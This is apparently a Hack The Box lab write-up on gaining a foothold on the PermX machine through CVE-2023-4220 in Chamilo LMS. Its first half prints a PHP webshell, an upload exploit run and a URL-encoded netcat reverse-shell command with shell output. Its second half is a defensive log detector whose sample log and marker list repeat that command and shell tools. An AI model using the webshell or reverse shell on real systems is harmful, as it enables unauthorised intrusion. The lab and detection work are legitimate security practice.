CVE-2023-4220
The target Chamilo instance is suspected to be vulnerable to [[PermX_CVE-2023-4220#[CVE-2023-4220](https://nvd.nist.gov/vuln/detail/CVE-2023-4220)|CVE-2023-4220]] because it runs an outdated version: 1.11.24
```
┌──(kali㉿kali)-[~/…/htb/labs/permx/chamilo-lms-unauthenticated-big-upload-rce-poc]
└─$ cat webshell.php
# Take input from the url parameter. shell.php?cmd=whoami
<?php system($_GET['cmd']); ?>
```
I have prepared a PHP webshell
```
┌──(kali㉿kali)-[~/…/htb/labs/permx/chamilo-lms-unauthenticated-big-upload-rce-poc]
└─$ python3 main.py -u http://lms.permx.htb/ -a webshell
Enter the name of the webshell file that will be placed on the target server (default: webshell.php): webshell.php
[+] Upload successfull [+]
Webshell URL: http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/webshell.php?cmd=<command>
```
Running the exploit script
```
┌──(kali㉿kali)-[~/…/htb/labs/permx/chamilo-lms-unauthenticated-big-upload-rce-poc]
└─$ curl http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/webshell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Code execution confirmed
```
┌──(kali㉿kali)-[~/…/htb/labs/permx/chamilo-lms-unauthenticated-big-upload-rce-poc]
└─$ curl http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/webshell.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.143%209999%20%3E%2Ftmp%2Ff
```
Sending a URL-encoded reverse shell command
```
┌──(kali㉿kali)-[~/archive/htb/labs/permx]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.143] from (UNKNOWN) [10.10.11.23] 38934
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname
permx
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.23  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 fe80::250:56ff:fe94:9461  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:fe94:9461  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:94:94:61  txqueuelen 1000  (Ethernet)
        RX packets 11493968  bytes 1927319365 (1.9 GB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 10647216  bytes 4889701732 (4.8 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 10103  bytes 1123423 (1.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 10103  bytes 1123423 (1.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
```
Initial foothold established on the target system as the www-data account by exploiting [[PermX_CVE-2023-4220#[CVE-2023-4220](https://nvd.nist.gov/vuln/detail/CVE-2023-4220)|CVE-2023-4220]]
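From the defender's side, the whole chain above leaves a very recognisable trace in the web server's access log: a script file being requested from the bigupload `files/` directory (which should only ever hold uploaded data, never anything PHP executes), followed by a `cmd` query string that decodes to a shell pipeline. The following detector is an added example written for this writeup, not part of the PoC or of Chamilo. It parses combined-format access-log lines, flags any `.php`-style file served from `/main/inc/lib/javascript/bigupload/files/`, URL-decodes the `cmd` parameter and raises the severity when it contains shell indicators. The log lines are constructed for the example; the `bigUpload.php` handler path is the one named in the NVD entry and is not shown on this page, so it is treated only as a low-severity correlation point.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Chamilo paths involved. The "files/" directory is where the PoC on this page drops
# webshell.php; the bigUpload.php handler is the upload endpoint named in the NVD
# entry for CVE-2023-4220 (assumption for this example, not shown on the page).
UPLOAD_DIR = "/main/inc/lib/javascript/bigupload/files/"
UPLOAD_HANDLER = "/main/inc/lib/javascript/bigupload/inc/bigupload.php"

# Extensions a PHP-enabled server may execute; none of them belong in an upload directory.
SCRIPT_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)

# Substrings that indicate an interactive or reverse shell is being spawned through "cmd".
SHELL_MARKERS = ("mkfifo", "/bin/sh", "/bin/bash", "bash -i", "nc ", "2>&1")

# Combined-log-format parser: source address, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log (not captured from a real host); the request paths and the
# encoded reverse-shell command mirror what the writeup above shows.
SAMPLE_LOG = """\
10.10.14.143 - - [06/Jul/2024:10:00:01 +0000] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php HTTP/1.1" 200 12 "-" "python-requests/2.31.0"
10.10.14.143 - - [06/Jul/2024:10:00:03 +0000] "GET /main/inc/lib/javascript/bigupload/files/webshell.php?cmd=id HTTP/1.1" 200 54 "-" "curl/8.5.0"
10.10.14.143 - - [06/Jul/2024:10:00:09 +0000] "GET /main/inc/lib/javascript/bigupload/files/webshell.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.143%209999%20%3E%2Ftmp%2Ff HTTP/1.1" 200 0 "-" "curl/8.5.0"
10.10.14.50 - - [06/Jul/2024:10:01:00 +0000] "GET /main/inc/lib/javascript/bigupload/files/report.pdf HTTP/1.1" 200 90210 "-" "Mozilla/5.0"
10.10.14.50 - - [06/Jul/2024:10:01:05 +0000] "GET /index.php HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
"""


def analyse_line(line: str):
    """Return a finding dict for one access-log line, or None if the line is benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = unquote(parts.path)
    base = {"src": m.group("src"), "ts": m.group("ts"), "path": path, "cmd": None}
    if path.lower() == UPLOAD_HANDLER:
        # Legitimate big-file uploads hit this too; keep it as a correlation point only.
        return {**base, "severity": "info", "reason": "upload handler called"}
    if not (path.lower().startswith(UPLOAD_DIR) and SCRIPT_EXT_RE.search(path)):
        return None
    # A script inside the upload directory is the core indicator of this vulnerability.
    cmds = parse_qs(parts.query).get("cmd", [])  # parse_qs already URL-decodes the values
    cmd = cmds[0] if cmds else None
    hit_markers = [mk for mk in SHELL_MARKERS if cmd and mk in cmd]
    if hit_markers:
        return {**base, "cmd": cmd, "severity": "critical",
                "reason": "shell spawned via cmd: " + ", ".join(hit_markers)}
    return {**base, "cmd": cmd, "severity": "high",
            "reason": "script executed from upload directory"}


def scan(log_text: str):
    """Run analyse_line over every line and return the findings in log order."""
    return [f for f in (analyse_line(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"[{finding['severity']:8}] {finding['src']} {finding['path']} -> {finding['reason']}")
        if finding["cmd"]:
            print(f"           decoded cmd: {finding['cmd']}")
```

Any "high" or "critical" hit here is worth an immediate look at the directory listing of `files/` on the server. The durable fix is to upgrade past 1.11.24, and independently of the upgrade the web server should be configured so that nothing under the bigupload `files/` path is ever handed to the PHP interpreter, which removes the execution step even if an upload slips through.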